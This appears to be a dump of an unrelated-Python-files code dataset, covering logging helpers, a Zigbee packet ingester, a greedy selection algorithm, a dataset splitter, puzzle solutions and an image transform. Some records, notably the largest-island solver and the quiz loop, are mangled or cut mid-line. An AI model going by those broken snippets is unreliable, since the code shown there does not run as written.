message\n \"\"\"\n self._log.debug(s_message)\n\n def info(self, s_message):\n \"\"\"\n write info message\n \"\"\"\n self._log.info(s_message)\n\n def warning(self, s_message):\n \"\"\"\n write warning message\n \"\"\"\n self._log.warning(s_message)\n\n def error(self, s_message):\n \"\"\"\n write error message\n \"\"\"\n self._log.error(s_message)\n\n\n def critical(self, s_message):\n \"\"\"\n write critical message\n \"\"\"\n self._log.critical(s_message)\n\ndef log_warning(log_obj, s_phrase):\n \"\"\"\n helper function to know if to log to a file or stdout based on 'log_obj'\n being None or not\n \"\"\"\n if log_obj is None:\n print(s_phrase)\n else:\n log_obj.warning(s_phrase)\n\ndef log_info(log_obj, s_phrase):\n \"\"\"\n helper function to know if to log to a file or stdout based on 'log_obj'\n being None or not\n \"\"\"\n if log_obj is None:\n print(s_phrase)\n else:\n log_obj.info(s_phrase)\n\ndef log_critical(log_obj, s_phrase):\n \"\"\"\n helper function to know if to log to a file or stdout based on 'log_obj'\n being None or not\n \"\"\"\n if log_obj is None:\n print(s_phrase)\n else:\n log_obj.critical(s_phrase)\n\ndef log_error(log_obj, s_phrase):\n \"\"\"\n helper function to know if 
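Editor's aside on the log_utils record above: its core setup idea (one named logger per file, guarded against duplicate handlers, with a rotating file handler) boils down to the sketch below. Sizes and the format string mirror the record; the function name is mine.

import logging
from logging.handlers import RotatingFileHandler

def make_logger(path: str, level: str = "DEBUG") -> logging.Logger:
    logger = logging.getLogger(path)   # one logger per log file, as in the record
    if not logger.handlers:            # avoid stacking handlers on re-init
        handler = RotatingFileHandler(path, maxBytes=9_000_000, backupCount=9)
        handler.setFormatter(
            logging.Formatter("%(asctime)s %(levelname)s %(message)s"))
        logger.addHandler(handler)
        logger.setLevel(getattr(logging, level.upper()))
        logger.propagate = False
    return logger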
to log to a file or stdout based on 'log_obj'\n being None or not\n \"\"\"\n if log_obj is None:\n print(s_phrase)\n else:\n log_obj.error(s_phrase)\n\ndef log_debug(log_obj, s_phrase):\n \"\"\"\n helper function to know if to log to a file or stdout based on 'log_obj'\n being None or not\n \"\"\"\n if log_obj is None:\n print(s_phrase)\n else:\n log_obj.debug(s_phrase)\n\ndef init_logging(log_obj, s_name=\"unnamed\"):\n \"\"\"\n generic initializer from log obj 'log_obj' - returns None (i.e. does\n nothing) if 'log_obj' is False; returns 'log_obj' if it is not None\n and if it is None, returns a newly created default log object whose\n file is in the directory os.environ[\"LOG_DIR\"] and filename is 's_name'\n \"\"\"\n if log_obj is False:\n return None\n\n if log_obj is not None:\n return log_obj\n\n s_log_dir = os.environ.get(\"LOG_DIR\")\n if s_log_dir is None:\n s_log_dir = \".\"\n s_date = datetime.strftime(datetime.now(), '%Y-%m-%d')\n\n return Logger(os.path.join(s_log_dir, s_date+\"_\"+s_name+\".log\"))\n\ndef get_log_line_components(s_line):\n \"\"\"\n given a log line, returns its datetime as a datetime object\n and its log level as a string and the message itself as another\n string - those three are returned as a tuple. the log level\n is returned as a single character (first character of the level's\n name, capitalized).\n \"\"\"\n try:\n dtime = datetime.strptime(s_line[0:19], \"%Y-%m-%d %H:%M:%S\")\n except ValueError:\n raise LogUtilsError(\"Not a proper date/time at start of log line!\")\n\n if dtime is None:\n raise LogUtilsError(\"Not a proper date/time at start of log line!\")\n\n log_level = s_line[24]\n\n if log_level == \"D\":\n s_line = s_line[30:]\n elif log_level == \"I\":\n s_line = s_line[29:]\n elif log_level == \"W\":\n s_line = s_line[32:]\n elif log_level == \"E\":\n s_line = s_line[30:]\n elif log_level == \"C\":\n s_line = s_line[33:]\n else:\n raise LogUtilsError(\"log-level not in log line!\")\n\n return s_line, dtime, log_level\n\n\nclass ReverseLogFileIterator():\n \"\"\"\n class to iterate through a log file from end to start, verifying\n that the last line is a warning line has an \"END\" in it and\n iterating through lines only until the first encounter of a line\n with \"START\" in it (if no such START warning line is found an\n error is thrown, same for case when no END line is found).\n \"\"\"\n\n def __init__(self, s_log_filename):\n \"\"\"\n do some checking right off the bat\n \"\"\"\n self._s_log_filename = s_log_filename\n self._iterator = ReverseFileIterator(s_log_filename)\n self._b_started = False\n self._b_ended = False\n\n def __iter__(self):\n \"\"\"\n part of allowing this class's objects to also be used as iterators\n \"\"\"\n return self\n\n def __next__(self):\n \"\"\"\n next..\n \"\"\"\n if self._b_ended is True:\n raise StopIteration\n\n try:\n s_line = self._iterator.__next__()\n except StopIteration:\n if not self._b_started:\n raise LogUtilsError(\"log file %s has no START directive!\" %\n (self._s_log_filename,))\n if not self._b_ended:\n raise LogUtilsError(\"log file %s has no END directive!\" %\n (self._s_log_filename,))\n\n s_message, dtime, log_level = get_log_line_components(s_line)\n\n if self._b_started is False:\n # only on 1st iteration do we get here\n if len(s_message) < 3 or s_message[0:3] != \"END\":\n raise LogUtilsError(\"Last line has no 'END'; file: %s\" %\n (self._s_log_filename,))\n\n self._b_started = True\n return s_message, dtime, log_level\n\n # only on non 1st iteration do we get here, you should 
never find an\n # 'END' in the line again!\n if len(s_message) >= 3 and s_message[0:3] == \"END\":\n raise LogUtilsError(\"2nd 'END' found before any 'START'!\")\n if len(s_message) >= 5 and s_message[0:5] == \"START\":\n # on the next iteration we'll raise a StopIteration\n self._b_ended = True\n\n return s_message, dtime, log_level\n\n def all(self):\n \"\"\"\n runs next() over and over until the end\n \"\"\"\n return [i for i in self]\n\ndef verify_last_log_session(s_log_filename, log_obj=None):\n \"\"\"\n verify some basic things about last log session, returns the\n duration of the entire session if successful, or None, if\n verification failed\n \"\"\"\n # s_short_filename = os.path.split(s_log_filename)[-1]\n end_dtime = None\n n_errors = 0\n n_criticals = 0\n n_warnings = 0\n n_lines = 0\n dtime = None\n for s_line, dtime, s_log_type in ReverseLogFileIterator(s_log_filename):\n s_line_len = len(s_line) > 0\n assert s_line_len > 0\n if s_log_type == \"E\":\n n_errors += 1\n elif s_log_type == \"C\":\n n_criticals += 1\n elif s_log_type == \"W\":\n n_warnings += 1\n\n if not end_dtime:\n end_dtime = dtime\n\n n_lines += 1\n\n # start_time = dtime\n # delta_time = end_dtime-start_time\n assert dtime is not None\n delta_time = end_dtime-dtime\n\n if log_obj:\n # log_obj.info(\"session duration (seconds): %d\" % delta_time.seconds)\n if n_warnings > 0:\n log_obj.warning(\"# of warnings: %d\" % n_warnings)\n if n_errors > 0:\n log_obj.error(\"# of errors: %d\" % n_errors)\n if n_criticals > 0:\n log_obj.critical(\"# of criticals: %d\" % n_criticals)\n\n return delta_time, n_lines, n_warnings, n_errors, n_criticals\n\ndef get_last_session_query(s_log_filename):\n \"\"\"\n returns first query line it encounters while traversing the\n last session in a log file backwards\n \"\"\"\n # s_short_filename = os.path.split(s_log_filename)[-1]\n for s_line, dtime, s_log_type in ReverseLogFileIterator(s_log_filename):\n del dtime\n del s_log_type\n if s_line[0:6] == 'query:':\n return s_line[6:].strip()\n\n return None\n\nclass ModuleTests(unittest.TestCase):\n \"\"\"\n module tests\n \"\"\"\n @staticmethod\n def test01():\n \"\"\"\n a very basic test\n \"\"\"\n log = Logger(\"log_utils.log\", \"DEBUG\")\n log.debug(\"-->debug<--:hello world!\")\n log.info(\"-->info<--:hello world!\")\n log.warning(\"-->warning<--:hello world!\")\n log.error(\"-->error<--:hello world!\")\n log.critical(\"-->critical<--:hello world!\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"dorontal/python-scrapers","sub_path":"log_utils.py","file_name":"log_utils.py","file_ext":"py","file_size_in_byte":12403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32618524706","text":"import nonebot\nfrom nonebot.adapters.console import Adapter as ConsoleAdapter\n\n\nnonebot.init()\n\n\ndriver = nonebot.get_driver()\ndriver.register_adapter(ConsoleAdapter)\n\n\nnonebot.load_builtin_plugins(\"echo\") # 内置插件\n# nonebot.load_plugin(\"third_party_plugin\") # 第三方插件\n# nonebot.load_plugins(\"awesome_bot/plugins\") # 本地插件\n\n\nif __name__ == \"__main__\":\n nonebot.run()","repo_name":"ilyaw39/Isten","sub_path":"client/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"43071200211","text":"import json\nimport os\nimport shutil\n\ncontract_dirs = [d for d in os.listdir('../out') if d.endswith('.sol')]\n\nfor d in contract_dirs:\n 
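Editor's aside on the ABI-copying record above: a pathlib variant of the same walk-and-copy, assuming the record's layout (one "*.sol" directory per contract under ../out). This is a sketch of the idea, not the project's actual script.

import shutil
from pathlib import Path

out_dir = Path("../out")
abi_dir = Path("flood_contract_abi/abis")
abi_dir.mkdir(parents=True, exist_ok=True)

for contract_dir in out_dir.glob("*.sol"):       # one directory per source file
    for artifact in contract_dir.glob("*.json"):
        shutil.copyfile(artifact, abi_dir / artifact.name)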
contract_files = os.listdir(os.path.join('../out', d))\n for contract_file in contract_files:\n contract_name = contract_file[:-5]\n contract_path = os.path.join('../out', d, contract_file)\n\n shutil.copyfile(\n contract_path, 'flood_contract_abi/abis/' + contract_file)\n","repo_name":"fulmin-labs/flood-contracts","sub_path":"python/copy_abis.py","file_name":"copy_abis.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"75248898","text":"def largestIsland(grid):\n m, n = len(grid), len(grid[0])\n \n colors = {0:0}\n \n def dfs(x, y, color):\n grid[x][y] = color\n visited.add((x, y))\n \n for i, j in ((x-1, y), (x+1, y), (x, y-1), (x,y+1)):\n if 0<=i=0:\n # print(\",top = \", grid[i-1][j], end = ' ')\n neighbors.add(grid[i-1][j])\n top = colors[grid[i-1][j]]\n if i+1=0:\n # print(\",left = \", grid[i][j-1], end = ' ')\n left = colors[grid[i][j-1]]\n neighbors.add(grid[i][j-1])\n if j+1 6 and not pkt.haslayer(ZigbeeZLLCommissioningCluster):\n valid = False # Traffic here is when a device has no short, and uses extended in its place before it gets\n # a short asisgned, good indicator that pan id conflict not underway, too much investment\n # for now but good for capstone\n\n if valid:\n #session = db.createDBSession()\n db.createPacket(session, rectime, panid, src, dest, pkt_raw, ext_src, nwk_src, nwk_ext)\n #session.close()\n except TypeError as e:\n print(\"TypeError raised: Likely malformed packet\")\n pass\n\n\ndef start_sniff(e):\n conf.dot15d4_protocol = \"zigbee\"\n sniff(iface=\"lo\", prn=parse_packet, stop_filter=lambda x: e.is_set())\n\n\nif __name__ == '__main__':\n event = threading.Event()\n start_sniff(event)\n","repo_name":"LeulBM/ToplogyTool","sub_path":"ingestion.py","file_name":"ingestion.py","file_ext":"py","file_size_in_byte":3585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1570652239","text":"import sys\nimport pickle\nimport numpy as np\nfrom tqdm import tqdm, trange\nfrom evolutionary import match_degree\nfrom square_ovlp_detection import Square\nfrom overlap_area import area\n\nclass Greedy:\n def __init__(self, points: np.ndarray, centers: np.ndarray, r: float, R: float, budget: float, bid: np.ndarray,\n weight: np.ndarray, kind: str):\n self.points = points\n self.centers = centers\n self.r = r\n self.R = R\n self.budget = budget\n self.bid = bid\n self.w = weight\n self.kind = kind\n\n self.squares = [Square(y + r, y - r, x - r, x + r) for x, y in points]\n\n self.num = len(points)\n self.matching_degree_all = match_degree(points, centers, R)\n self.matching_degree_proportion = self.matching_degree_all / np.sum(self.matching_degree_all)\n self.matching_degree_proportion[self.matching_degree_proportion < 0] = 0\n self.selected = []\n self.unselected = [i for i in range(len(points))]\n\n self.covered_area = 0\n self.total_area = area(self.squares)\n # marginal contribution per cost\n self.mcpc = np.zeros(self.num)\n\n def set_weight(self, w: np.ndarray):\n assert len(w) == 3, \"w's length is not 3\"\n self.w = w\n\n def set_bid(self, bid: np.ndarray):\n self.bid = bid\n\n def marginal_contribution(self, i):\n if self.kind == 'matching_degree':\n return self.matching_degree_proportion[i]\n else:\n this_area = area([self.squares[j] for j in self.selected + [i]])\n if self.kind == 'diversity':\n return this_area - self.covered_area\n else :\n return self.w[0] * 1 / self.num + self.w[1] * 
self.matching_degree_proportion[i] + \\\n self.w[2] * (this_area - self.covered_area) / self.total_area\n\n def total(self, max_i):\n temp_selected = self.selected + [max_i]\n if self.kind == 'matching_degree':\n return np.sum(self.matching_degree_proportion[np.array(temp_selected)])\n else:\n this_area = area([self.squares[_] for _ in temp_selected])\n if self.kind == 'diversity':\n return this_area\n else:\n return self.w[0] * ( len(self.selected) + 1 ) / num + \\\n self.w[1] * np.sum(self.matching_degree_proportion[np.array(temp_selected)]) + \\\n self.w[2] * this_area / self.total_area\n\n def quantity_driven(self):\n sorted_bid = np.sort(self.bid)\n sorted_bid_index = np.argsort(self.bid)\n foo = self.budget / np.arange(1, len(sorted_bid)+1) >= sorted_bid\n self.selected = [sorted_bid_index[_] for _ in range(len(sorted_bid)) if foo[_]]\n\n def one_round(self):\n for i in self.unselected:\n foo = self.marginal_contribution(i)\n self.mcpc[i] = foo / self.bid[i]\n\n max_i = np.argmax(self.mcpc)\n self.total_value = self.total(max_i)\n\n return max_i\n\n def greedy_selection(self):\n '''\n\n :param w: w is a vector of three elements, representing the weight of three measurement\n :return:\n '''\n max_mcpc_index = np.argmin(self.bid)\n self.mcpc[max_mcpc_index] = self.marginal_contribution(max_mcpc_index)\n self.covered_area = 4 * self.r**2\n self.total_value = self.total(max_mcpc_index)\n\n pbar = tqdm(total=self.num)\n while len(self.unselected) > 0 and self.mcpc[max_mcpc_index] >= 2 * self.total_value / self.budget:\n pbar.update()\n self.selected.append(max_mcpc_index)\n self.unselected.remove(max_mcpc_index)\n self.mcpc[max_mcpc_index] = -1\n self.covered_area = area([self.squares[_] for _ in self.selected])\n max_mcpc_index = self.one_round()\n pbar.close()\n\n def clear(self):\n self.selected = []\n self.unselected = [_ for _ in range(self.num)]\n self.covered_area = 0\n self.mcpc = np.zeros(self.num)\n\n\n\nif __name__ == '__main__':\n kind = 'diversity'\n\n d = np.load('data/points.npz')\n points = d['points']\n labels = d['labels']\n centers = np.load('data/centers.npy')\n r = 0.4\n R = 5\n budget = 20000\n num = len(points)\n bid = np.random.uniform(0, 1, num) * 3 + 3\n weight = np.random.rand(3)\n weight[2] *= 2\n weight = weight / np.sum(weight)\n population = 1\n\n X = np.random.permutation(np.arange(len(points)))\n X = X[:num]\n greedy_object = Greedy(points[X], centers[labels][X], r, R, budget, bid, weight, kind)\n\n\n # print information\n print(\"kind = {}, budget = {}, U[3, 6]\".format(kind, budget))\n result = []\n for i in range(population):\n greedy_object.greedy_selection()\n\n m = np.sum(greedy_object.matching_degree_all[np.array(greedy_object.selected)])\n a = area([greedy_object.squares[i] for i in greedy_object.selected])\n result.append(np.array([len(greedy_object.selected), m, a]))\n\n greedy_object.clear()\n bid = np.random.uniform(0, 1, num) * 3 + 3\n greedy_object.set_bid(bid)\n weight = np.random.rand(3)\n weight[2] *= 2\n weight = weight / np.sum(weight)\n greedy_object.set_weight(weight)\n\n\n result = np.vstack(tuple(result))\n np.save('data/{}_{}_uniform_result.npy'.format(kind, budget), result)\n\n\n","repo_name":"Osagawara/text_classification","sub_path":"greedy_selection.py","file_name":"greedy_selection.py","file_ext":"py","file_size_in_byte":5403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23104624099","text":"import pandas as pd \nimport numpy as np\nfrom argparse import 
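Editor's aside on the greedy-selection record above: its loop repeatedly picks the candidate with the best marginal contribution per cost under a budget. The sketch below shows only the simpler fixed-value ratio rule; the record's real objective is submodular (it recomputes coverage-area gains each round), so treat this as an assumption-laden simplification.

import numpy as np

def greedy_select(values: np.ndarray, bids: np.ndarray, budget: float) -> list:
    """Pick items by value-per-cost until the budget is exhausted."""
    chosen, spent = [], 0.0
    order = np.argsort(-(values / bids))  # best ratio first
    for i in order:
        if spent + bids[i] <= budget:
            chosen.append(int(i))
            spent += float(bids[i])
    return chosen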
ArgumentParser\nimport json\nimport os \nimport sklearn\n\nargparser=ArgumentParser(\"Splits the desired csv file to 3 different files for training/validation/test\")\n\nargparser.add_argument(\n '-c',\n '--conf',\n default='/content/lepidoptera/script/lepidoptere_detection/src/config/lepido_detection.json',\n help='path to configuration file')\n\ndef _main_(args):\n\n config_path=args.conf\n\n with open(config_path) as config_buffer:\n config=json.loads(config_buffer.read())\n\n path_to_dataset=\"/content/lepidoptera/script/lepidoptere_detection/src/data/inputs/all_annotations.csv\"\n\n with open(path_to_dataset, 'r') as f:\n lines = f.readlines()\n img_path = []\n for line in lines:\n line = line.replace('\\n', '')\n line = line.split(',')\n img_path.append(line[0])\n img_path = set(img_path)\n print(\"Il y a 433 images différents dans le csv final\", len(img_path))\n\n # proportion of the splits of the whole dataset\n\n proportion_train=0.8\n proportion_val=0.1\n \n count = 0\n \n df=pd.read_csv(path_to_dataset)\n print(df.head())\n limit_train = int(proportion_train*len(img_path))\n print(\"limit_train\", limit_train)\n limit_validation = int(proportion_val*len(img_path))\n limit_test = len(img_path) - limit_train - limit_validation\n #on veut afficher une liste contenant les éléments de la première colonne\n print(\"il y a 433 images différentes dans le csv qu'on split\", len(df.iloc[:,0].unique()))\n\n with open(path_to_dataset, 'r') as f:\n lines = f.readlines()\n with open(\"/content/lepidoptera/script/lepidoptere_detection/src/data/inputs/train.csv\", 'w') as f2:\n for i, line in enumerate(lines):\n #on veut ajouter limit_train image différent au csv train.csv\n if count < limit_train:\n line1 = lines[i].split(',')\n line2 = lines[i+1].split(',')\n \n if line1[0] == line2[0]:\n f2.write(lines[i])\n a = lines[i]\n else:\n count += 1\n f2.write(lines[i])\n a = lines[i]\n \n else:\n break\n count = 0\n with open(\"/content/lepidoptera/script/lepidoptere_detection/src/data/inputs/valid.csv\", 'w') as f3:\n #on veut enlever tous les éléments avant a dans la liste lines\n j = lines.index(a)\n for i in range(j, len(lines)):\n if count < limit_validation:\n line1 = lines[i].split(',')\n line2 = lines[i+1].split(',')\n if line1[0] == line2[0]:\n f3.write(lines[i])\n b = lines[i]\n else:\n count += 1\n f3.write(lines[i])\n b = lines[i]\n else:\n break\n count = 0\n with open(\"/content/lepidoptera/script/lepidoptere_detection/src/data/inputs/test.csv\", 'w') as f4:\n j = lines.index(b)\n for i in range(j, len(lines)):\n if count < limit_test:\n line1 = lines[i].split(',')\n line2 = lines[i+1].split(',')\n if line1[0] == line2[0]:\n f4.write(lines[i])\n else:\n count += 1\n f4.write(lines[i])\n else:\n break\n\n #vérifions s'il n'y pas une image qui est présente dans deux csv différents\n\n with open(\"/content/lepidoptera/script/lepidoptere_detection/src/data/inputs/train.csv\", 'r') as f5:\n lines = f5.readlines()\n img_path = []\n for line in lines:\n line = line.replace('\\n', '')\n line = line.split(',')\n img_path.append(line[0])\n img_path = set(img_path)\n\n with open(\"/content/lepidoptera/script/lepidoptere_detection/src/data/inputs/valid.csv\", 'r') as f6:\n lines = f6.readlines()\n img_path2 = []\n for line in lines:\n line = line.replace('\\n', '')\n line = line.split(',')\n img_path2.append(line[0])\n img_path2 = set(img_path2)\n\n with open(\"/content/lepidoptera/script/lepidoptere_detection/src/data/inputs/test.csv\", 'r') as f7:\n lines = f7.readlines()\n img_path3 = []\n 
for line in lines:\n line = line.replace('\\n', '')\n line = line.split(',')\n img_path3.append(line[0])\n img_path3 = set(img_path3)\n\n #regardons si les listes ont un élément en commun\n print(\"il y a\", len(img_path.intersection(img_path2)), \"images en commun entre train et valid\")\n print(\"il y a\", len(img_path.intersection(img_path3)), \"images en commun entre train et test\")\n\n\n\nif __name__=='__main__':\n _args = argparser.parse_args()\n _main_(args=_args)\n","repo_name":"lucien92/lepidoptera","sub_path":"script/lepidoptere_detection/src/data/inputs/get_train_test_val.py","file_name":"get_train_test_val.py","file_ext":"py","file_size_in_byte":5337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22900216384","text":"class MiniatureDachshund:\n def maxMikan(self, mikan, weight):\n mikan = list(mikan)\n mikan.sort()\n\n counter = 0\n for m in mikan:\n next = weight + m\n if next > 5000:\n break\n\n counter += 1\n weight = next\n\n return counter\n\n# BEGIN KAWIGIEDIT TESTING\n# Generated by KawigiEdit-pfx 2.1.9\nimport sys\nimport time\ndef KawigiEdit_RunTest(testNum, p0, p1, hasAnswer, p2):\n\tsys.stdout.write(str(\"Test \") + str(testNum) + str(\": [\") + str(\"{\"))\n\tfor i in range(len(p0)):\n\t\tif (i > 0):\n\t\t\tsys.stdout.write(str(\",\"))\n\t\t\n\t\tsys.stdout.write(str(p0[i]))\n\t\n\tsys.stdout.write(str(\"}\") + str(\",\") + str(p1))\n\tprint(str(\"]\"))\n\tobj = MiniatureDachshund()\n\tstartTime = time.clock()\n\tanswer = obj.maxMikan(p0, p1)\n\tendTime = time.clock()\n\tres = True\n\tprint(str(\"Time: \") + str((endTime - startTime)) + str(\" seconds\"))\n\tif (hasAnswer):\n\t\tprint(str(\"Desired answer:\"))\n\t\tprint(str(\"\\t\") + str(p2))\n\t\n\tprint(str(\"Your answer:\"))\n\tprint(str(\"\\t\") + str(answer))\n\tif (hasAnswer):\n\t\tres = answer == p2\n\t\n\tif (not res):\n\t\tprint(str(\"DOESN'T MATCH!!!!\"))\n\telif ((endTime - startTime) >= 2):\n\t\tprint(str(\"FAIL the timeout\"))\n\t\tres = False\n\telif (hasAnswer):\n\t\tprint(str(\"Match :-)\"))\n\telse:\n\t\tprint(str(\"OK, but is it right?\"))\n\t\n\tprint(str(\"\"))\n\treturn res\n\nall_right = True\n\n\n# ----- test 0 -----\np0 = [100,100,100,100,100]\np1 = 4750\np2 = 2\nall_right = KawigiEdit_RunTest(0, p0, p1, True, p2) and all_right\n# ------------------\n\n# ----- test 1 -----\np0 = [100,100,100,100,50]\np1 = 4750\np2 = 3\nall_right = KawigiEdit_RunTest(1, p0, p1, True, p2) and all_right\n# ------------------\n\n# ----- test 2 -----\np0 = [120,90,130,100,110,80]\np1 = 3000\np2 = 6\nall_right = KawigiEdit_RunTest(2, p0, p1, True, p2) and all_right\n# ------------------\n\n# ----- test 3 -----\np0 = [50]\np1 = 5000\np2 = 0\nall_right = KawigiEdit_RunTest(3, p0, p1, True, p2) and all_right\n# ------------------\n\n# ----- test 4 -----\np0 = [200,50,200,50,200,50,200,50]\np1 = 4800\np2 = 4\nall_right = KawigiEdit_RunTest(4, p0, p1, True, p2) and all_right\n# ------------------\n\nif (all_right):\n\tprint(str(\"You're a stud (at least on the example cases)!\"))\nelse:\n\tprint(str(\"Some of the test cases had errors.\"))\n\n# PROBLEM STATEMENT\n# Dachshund is a popular dog breed. In this problem, a miniature dachshund is defined as a dachshund whose weight is not more than 5,000 grams.\n# \n# \n# Lun the miniature dachshund loves mikan (satsuma oranges). She has just bought some mikan. You are given a tuple (integer) mikan. It gives the weight of all mikan she bought. 
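Editor's aside on the dataset-splitting record above: its end-of-script checks verify that no image appears in two splits. That leakage-free property is easier to guarantee by splitting the set of images first and then routing annotation rows, as in this sketch (row format, column 0 = image path, is an assumption matching the record's CSV).

import random

def split_by_image(rows, train=0.8, val=0.1, seed=0):
    """Split annotation rows so every image lands in exactly one subset."""
    images = sorted({r[0] for r in rows})        # column 0 = image path
    random.Random(seed).shuffle(images)
    n_train = int(train * len(images))
    n_val = int(val * len(images))
    buckets = {img: "train" for img in images[:n_train]}
    buckets.update({img: "val" for img in images[n_train:n_train + n_val]})
    splits = {"train": [], "val": [], "test": []}
    for r in rows:
        splits[buckets.get(r[0], "test")].append(r)
    return splits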
For each valid i, mikan[i] is the weight of the i-th mikan in grams.\n# \n# \n# You are also given an integer weight. Currently, Lun weighs weight grams. When she eats i-th mikan, her weight increases by mikan[i] grams. If she eats multiple mikan, her weight increases by their total weight. She cannot eat just a part of a mikan. In other words, if she chooses to eat a mikan, she eats it completely.\n# \n# \n# She wants to remain being a miniature dachshund. That is, she wants her weight not to exceed 5,000 grams. Under this condition, calculate and return the maximum number of mikan Lun can eat.\n# \n# DEFINITION\n# Class:MiniatureDachshund\n# Method:maxMikan\n# Parameters:tuple (integer), integer\n# Returns:integer\n# Method signature:def maxMikan(self, mikan, weight):\n# \n# \n# CONSTRAINTS\n# -mikan will contain between 1 and 50 elements, inclusive.\n# -Each element of mikan will be between 50 and 200, inclusive.\n# -weight will be between 3,000 and 5,000, inclusive.\n# \n# \n# EXAMPLES\n# \n# 0)\n# {100, 100, 100, 100, 100}\n# 4750\n# \n# Returns: 2\n# \n# Here, Lun weighs 4,750 grams and has bought 5 mikan, each of which weighs 100 grams. When she eats 2 of these, her weight will be 4,950 grams. She should not eat more.\n# \n# 1)\n# {100, 100, 100, 100, 50}\n# 4750\n# \n# Returns: 3\n# \n# This time, one of the mikan is smaller. She can eat it with 2 of the 100-gram mikan. Note that her weight is allowed to be exactly 5,000 grams.\n# \n# 2)\n# {120, 90, 130, 100, 110, 80}\n# 3000\n# \n# Returns: 6\n# \n# When she is light enough, she can eat all of the mikan she has bought.\n# \n# 3)\n# {50}\n# 5000\n# \n# Returns: 0\n# \n# When her weight is already 5,000 grams, she should not eat anything.\n# \n# 4)\n# {200, 50, 200, 50, 200, 50, 200, 50}\n# 4800\n# \n# Returns: 4\n# \n# \n# \n# END KAWIGIEDIT TESTING\n\n#Powered by KawigiEdit-pfx 2.1.9!\n","repo_name":"cocodrips/TopCoder","sub_path":"599/MiniatureDachshund.py","file_name":"MiniatureDachshund.py","file_ext":"py","file_size_in_byte":4392,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"17659830138","text":"# Solution 1\nprint(sum(int(ch) for ch in open('numbers_text.txt', 'r')))\n\n# Solution 2\ndef sum_of_numbers(file_name):\n with open(file_name, \"r\") as file:\n return sum(int(x) for x in file)\n\n\nprint(sum_of_numbers('numbers_text.txt'))","repo_name":"AlexanderBedrosyan/Programming-Advanced-with-Python","sub_path":"File Handling - Lab/file_reader/file_reader.py","file_name":"file_reader.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"70089445954","text":"#Thomas Thorpe\r\n#Pet Service System Delete Record Search Windows Function\r\n\r\nfrom PetServiceDatabase import *\r\nfrom Notification import *\r\nfrom AreYouSureWindow import *\r\n\r\ndef DeleteRecord(came_from, current_record_id, table_name):\r\n are_you_sure = ConfirmationWindow(came_from, \"Are you sure you wish to delete this record? 
This action cannot be undone.\")\r\n are_you_sure.setModal(True)\r\n are_you_sure.show()\r\n are_you_sure.raise_()\r\n decision = are_you_sure.exec_() #confirm deletion window\r\n if decision == 1:\r\n if current_record_id != -1 and current_record_id != \"There Are No Records To Display\":\r\n database.DeleteRecord(table_name, current_record_id)\r\n came_from.DisplayAll()\r\n else: #notify if record not selected\r\n notification = Notification(came_from, \"Please select a record\")\r\n notification.setModal(True)\r\n notification.show()\r\n notification.raise_()","repo_name":"ThomasThorpe/PetMindingBusiness","sub_path":"Program/DeleteRecordSearchWindows.py","file_name":"DeleteRecordSearchWindows.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29890665516","text":"questions_list=[[\"1.how many continenets are there?\"],[\"2.what is capital of india?\"],[\"ng m kon sa course hota h?\"]]\noptions_list=[[\"1.four\",\"2.nine\",\"3.seven\",\"4.eight\"],[\"1.chandigarh\",\"2.bhopal\",\"3.chennai\",\"4.delhi\"],[\"1.software\",\"2.counselling\",\"3.tourism\",\"4.agriculture\"]]\nsolutions_list=[3,4,1]\nlifeline_key=[[\"1.four\",\"3.seven\"],[\"1.chandigarh\",\"4.delhi\"],[\"1.software\",\"2.counselling\"]]\nprint(\"there is one lifeline key if you want you can use it by entering 5050\")\nc=0\ni=0\nwhile i None:\n super().__init__()\n self.crop_size = [crop_size] if isinstance(crop_size, int) else crop_size\n self.resize_size = [resize_size]\n self.resize_max_size = resize_max_size\n self.mean = list(mean)\n self.std = list(std)\n self.interpolation = interpolation\n\n def forward(self, img: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Args:\n img (torch.Tensor): a tensor with values ranging from 0 to 255,\n and with shape [3, height, width].\n\n Returns: a normalized tensor with shape [3, height, width]\n\n \"\"\"\n img = F.resize(\n img,\n self.resize_size,\n max_size=self.resize_max_size,\n interpolation=self.interpolation,\n )\n img = F.center_crop(img, self.crop_size)\n if not isinstance(img, torch.Tensor):\n img = F.pil_to_tensor(img)\n img = F.convert_image_dtype(img, torch.float)\n img = F.normalize(img, mean=self.mean, std=self.std)\n return img\n\n def __repr__(self) -> str:\n format_string = self.__class__.__name__ + \"(\"\n format_string += f\"\\n crop_size={self.crop_size}\"\n format_string += f\"\\n resize_size={self.resize_size}\"\n format_string += f\"\\n mean={self.mean}\"\n format_string += f\"\\n std={self.std}\"\n format_string += f\"\\n interpolation={self.interpolation}\"\n format_string += \"\\n)\"\n return format_string\n\n def describe(self) -> str:\n return (\n \"Accepts ``PIL.Image``, batched ``(B, C, H, W)`` and single ``(C, H, W)`` image ``torch.Tensor`` objects. \"\n f\"The images are resized to ``resize_size={self.resize_size}`` using ``interpolation={self.interpolation}``, \"\n f\"followed by a central crop of ``crop_size={self.crop_size}``. 
